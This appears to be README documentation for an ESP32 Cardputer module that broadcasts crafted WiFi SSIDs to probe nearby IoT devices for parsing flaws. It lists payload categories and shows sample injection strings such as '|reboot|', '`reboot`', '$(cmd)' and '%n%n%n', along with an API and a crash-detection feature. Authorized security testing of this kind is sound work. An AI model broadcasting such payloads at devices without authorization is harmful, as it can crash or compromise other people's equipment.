ciwzeroclick

📡 CIW Zeroclick

SSID Injection Testing Framework for IoT & WiFi device security assessment.
Broadcasts crafted SSID payloads to detect parsing vulnerabilities, buffer overflows, and command injection flaws in nearby devices.

Based on CommandInWiFi-Zeroclick by V33RU.

---

🚀 Workflow

CIW Zeroclick Menu
        │
        ▼
[1] Select Categories → choose payload types (14 categories)
        │
        ▼
[2] Start Attack → loads payloads from SD, starts WiFi AP
        │
        ▼
[3] SSID Rotation → broadcasts each payload as AP name
        │
        ▼
[4] Device Monitoring → tracks connections & disconnections
        │
        ▼
[5] Crash Detection → alerts on quick disconnect (<10s)
        │
        ▼
[6] View Results → devices list & crash alerts

---

🎯 How It Works

WiFi devices constantly scan for available networks. When a device encounters an SSID, it must parse the network name to display it in its UI, store it in logs, or process it internally.

CIW Zeroclick exploits this by broadcasting specially crafted SSIDs containing:

• Command injection sequences (|reboot|, $(cmd), `cmd`)
• Buffer overflow patterns (oversized strings, boundary values)
• Format string attacks (%s%s%s%s, %n%n%n)
• Escape sequences (ANSI terminal escapes, control characters)
• Serialization attacks (JSON/XML/YAML injection, SQL injection)
• And more... (XSS, path traversal, CRLF, Log4Shell, NoSQL, heap spray)

If a device crashes, reboots, or disconnects abruptly after encountering a specific payload, it indicates a potential vulnerability in the device's SSID parsing logic.

---

📦 Payload Categories (14)

#	Category	Count	Description
1	wifi_cmd	25	Command injection (pipe, backtick, subshell, semicolon)
2	wifi_overflow	26	Buffer overflow (oversized, boundary, null-fill, patterns)
3	wifi_fmt	15	Format string (%s, %n, %x, %p, positional)
4	wifi_probe	14	Encoding probes (null bytes, UTF-8 edge cases, BOM, RTL)
5	wifi_esc	8	Terminal escape sequences (ANSI clear, OSC title, color)
6	wifi_serial	13	Serialization attacks (JSON, XML, SQL, YAML, SSTI, DDE)
7	wifi_enc	8	Encoding bypasses (fullwidth Unicode, URL-encoding, HTML entities)
8	wifi_chain	8	Multi-SSID chained attacks (split payloads across rotations)
9	wifi_heap	8	Heap exploitation patterns (dlmalloc, canaries, spray)
10	wifi_xss	8	Cross-site scripting (script tags, event handlers, iframe)
11	wifi_path	6	Path traversal (../../../, URL-encoded, /proc/self)
12	wifi_crlf	6	HTTP header injection (Set-Cookie, Location, smuggling)
13	wifi_jndi	6	Log4Shell / JNDI (LDAP, DNS, RMI, env leak)
14	wifi_nosql	6	NoSQL / LDAP injection (MongoDB operators, LDAP filter)
	Total	157

---

📱 Cardputer UI

Main Menu

• Select Categories → toggle individual categories on/off with checkboxes
• [START] Attack → load payloads and begin broadcasting
• View Devices → list of devices that connected during broadcast
• View Alerts → crash alerts (devices that disconnected in <10 seconds)
• Set Rotation → configure SSID rotation interval (1–3600 seconds, default 5s)

Broadcast Screen

CIW Broadcasting
SSID: |reboot|
Payload: 3/157
Cat: wifi_cmd
Devices: 2
Alerts: 1
Next: 3s
;/. prev/next  BS stop

---

🌐 Web Dashboard

Accessible from the Admin Console (/evil-menu → CIW Zeroclick) or directly at /ciw.

• Category selector — click to toggle categories before deploying
• Start / Stop — control broadcast remotely
• Live status — current SSID, payload index, device count, alert count
• Devices panel — MAC addresses + triggering SSID for each connected device
• Alerts panel — crash alerts with MAC, SSID, and disconnect duration

Web API Endpoints

Method	Endpoint	Description
GET	/ciw	Dashboard HTML page
GET	/api/ciw/payloads	List all payloads (JSON)
GET	/api/ciw/payloads?cat=wifi_cmd	Filter by category
POST	/api/ciw/deploy	Start broadcast (body: cats=wifi_cmd,wifi_fmt)
POST	/api/ciw/stop	Stop broadcast
GET	/api/ciw/status	Current status (JSON)
GET	/api/ciw/devices	Connected devices (JSON)
GET	/api/ciw/alerts	Crash alerts (JSON)

---

💻 Serial Commands

Command	Description
ciw_start	Load payloads and start broadcasting
ciw_stop	Stop broadcast
ciw_status	Show current status (broadcasting, payload index, devices, alerts)

---

📁 SD Card Structure

/evil/
  └── ciw/
       └── payloads.json    ← 157 default payloads (auto-created on first use)

The payloads.json file is automatically generated on first launch if not present.
You can also edit it manually to add custom payloads. Format:

[
  {"t":"|reboot|", "c":"wifi_cmd", "d":"Pipe operator reboot"},
  {"t":"AAAA...","c":"wifi_overflow","d":"32-byte A fill"},
  ...
]

• t — payload text (used as SSID, max 32 chars)
• c — category name (must match one of the 14 categories)
• d — description (for reference only)

---

🔍 Crash Detection

When a device connects to the broadcast AP and disconnects within 10 seconds, it is flagged as a potential crash:

• The LED turns red momentarily
• An alert entry is created with the device MAC, triggering SSID, and disconnect duration
• Up to 10 alerts are stored in a circular buffer
• Alerts are visible on the Cardputer screen, web dashboard, and serial output

Note: A quick disconnect does not guarantee a crash — the device may have simply moved away or rejected the AP. Further investigation (device logs, firmware analysis) is needed to confirm the root cause.

---

⌨️ Keyboard Shortcuts

Context	Keys	Action
Menu	; / .	Navigate up / down
Menu	Enter	Select / toggle category
Menu	Backspace	Back to main menu
Broadcast	; / .	Previous / next payload (manual)
Broadcast	Backspace	Stop broadcast and return
Rotation	0-9	Type interval value
Rotation	Enter	Confirm interval

---

📑 Example Serial Output

CIW: Created default payloads.json on SD
CIW: Loaded 157 payloads
CIW: Broadcasting started - 157 payloads
CIW: First SSID: |reboot|
CIW: Rotated to [2/157] &reboot&
CIW: Device connected AA:BB:CC:DD:EE:FF
CIW: Rotated to [3/157] `reboot`
CIW: ALERT crash detected! Duration: 847ms
CIW: Rotated to [4/157] $reboot$
CIW: Broadcasting stopped

---

⚖️ Disclaimer

This module is designed for authorized security testing and research only.
It evaluates device behavior under abnormal WiFi SSID input conditions.
Use ethically, legally, and only on devices you own or have written authorization to test.
Unauthorized wireless interference may be illegal in your jurisdiction.

---

❓ FAQ

Will this actually hack/exploit devices?

No. CIW Zeroclick is a detection tool, not an exploit framework. It broadcasts strings that would be dangerous if a device passes SSIDs to a shell or parser unsanitized. It detects behavioral anomalies (crash, reboot, disconnect) — confirming root cause requires separate device-side analysis.

Can I add my own custom payloads?

Yes. Edit /evil/ciw/payloads.json on the SD card. Add entries in the format {"t":"your_payload","c":"wifi_cmd","d":"description"}. The category must be one of the 14 predefined categories. SSIDs are limited to 32 characters.

Why does the broadcast stop other WiFi features?

CIW uses the ESP32 in AP mode to broadcast the crafted SSIDs. This replaces any active captive portal or AP. When you stop the broadcast, WiFi mode is restored to APSTA.

What devices are most likely to be affected?

IoT devices, embedded systems, routers, and older firmware implementations that parse SSIDs without proper input sanitization are most susceptible. Modern smartphones and laptops generally handle malformed SSIDs safely.

How does chained mode (wifi_chain) work?

Some payloads are split across multiple SSIDs. If a device caches and concatenates SSIDs from sequential scans (e.g., in a log file), the combined result forms a complete attack string. This tests for persistent storage injection rather than single-parse vulnerabilities.